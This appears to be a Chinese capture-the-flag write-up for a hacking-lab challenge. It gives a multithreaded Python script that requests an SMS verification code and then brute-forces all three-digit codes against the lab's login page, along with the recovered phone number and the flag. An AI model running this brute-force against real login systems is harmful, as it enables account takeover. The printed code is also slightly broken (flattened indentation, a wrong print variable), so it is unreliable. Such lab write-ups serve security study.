思路:暴力破解3位纯数字的验证码
坑:在破解前,需要用脚本模拟点击获取验证码的链接,正如实际情况那样,服务器要先发送验证码,你才能开始输入验证码,否则服务器怎么知道你这验证码是不是正确的呢?
#coding=utf-8
from http import cookies
import requests;
from lxml import etree #解析html页面的包
import threading
curtask = 100
maxtask = 999
flag = False
lock = threading.Lock()
url = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901"
s = requests.session()
r1 = s.get(url)
url3 = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/vcode.php"
r = s.post(url=url3,data={
'getcode':1,
'mobi':13388886666
}) #模拟获取验证码
def threadrun():
global curtask, lock,flag
while not flag:
lock.acquire()
mytask = curtask
curtask = curtask + 1
lock.release()
if(mytask > maxtask):
break
url2 = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php"
res = s.post(url = url2, data={
'username':13388886666,
'vcode':mytask,
'Login':'submit'
})
res.encoding = res.apparent_encoding #解决中文乱码
print(str(i) + ": " + res.text)
if 'vcode' not in res.text:
flag = True
threadingNum = 50
threadingList = []
for i in range(threadingNum):
threadingList.append(threading.Thread(target=threadrun))
for i in threadingList:
i.start()
得到前任电话是:13399999999后,改下脚本里的username继续破解即可
最终flag是LKK8*(!@@sd